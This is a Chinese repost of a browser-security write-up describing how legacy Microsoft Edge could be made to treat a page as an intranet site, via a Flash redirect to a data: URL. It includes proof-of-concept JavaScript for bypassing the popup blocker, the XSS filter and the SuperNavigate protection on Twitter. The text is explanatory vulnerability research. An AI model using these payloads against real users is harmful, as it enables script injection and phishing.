时间:2023-04-24 17:12:02 | 来源:网站运营
时间:2023-04-24 17:12:02 来源:网站运营
通过伪造内网网站绕过弹出窗口屏蔽、XSS过滤器以及Navigate方法:原来的问题是无域网页(即具有空的document.domains的url)可以访问到任何文档来源的DOM,所以微软对他们添加一个随机域(GUID)进行修补。换句话说,无域空白网页现在已经不是空白的了。他们始终表现为{53394a4f-8c04-46ab-94af-3ab86ffcfd4c}这样的随机域名。1.在顶部加载data:url。我们本地现在是data,但是域名和加载此数据的域名相同。所以,我们现在还是在内网中。Edge尝试阻止我们在顶部加载data:url,不过现在flash可以让我们加载它。所以我们通过flash执行一个简单的geturl方法。请看下面的代码。我们正在将一个Flash渲染在一个iframe中,Flash本身会通过一个data:url来更改顶部窗口的URL。
2.使用document.write方法将data:url进行输出,这样他会返回给我们一个URL,但是这个域名是一个随机的GUID。所以我们已经进入到内网中。
<iframe></iframe><script>window[0].location.replace('geturl.swf?TARGET=_top&REDIR=data:,'+'<script>window.onload=function(){'+' document.write("We are in a GUID URL (Intranet Zone) now");'+' document.close();'+'}</script>');</script>
而且,将Flash放在iframe中是很重要的,否则Edge会拦截。但无论如何,一旦执行成功,我们就在内网区域。所以,让我们现在攻击吧~for (var i=0; i<5; i++){ window.open("http://www.bing.com","","width=200,height=600");}
绕过弹窗阻止程序POC:MS Edge - popUp blocker bypasswindow.open("https://www.caballero.com.ar/echo.php?xss=<script>alert(document.domain)</script>","_self");
绕过XSS过滤器POC:MS Edge - XSS Filter Bypasswin = window.open("https://www.twitter.com");function wait_for_tweet_post_iframe(){ // Wait until the twitter iframe exists if (win["tweet-post-iframe"]) { //Change the location of the twitter-iframe. This fires the prompt window.open("twitter_pass.html", "tweet-post-iframe"); clearInterval(interval); }}// Keep running until the twitter-iframe becomes availableinterval = setInterval(wait_for_tweet_post_iframe, 500);
在twitter网页上绕过SuperNavigate的POC:MS Edge - SuperNavigate Bypass多么有趣呀,最后一件事情,也许你注意到Twitter的提示似乎真的来自一个Twitter域名。您知道,当提示处于打开状态时,它始终显示启动它的URL的域,就像这样:本文参考来源于brokenbrowser,如若转载,请注明来源于嘶吼: 通过伪造内网网站绕过弹出窗口屏蔽、XSS过滤器以及Navigate方法 更多内容请关注“嘶吼专业版”——Pro4hou
关键词:过滤,方法,屏蔽,通过,窗口,伪造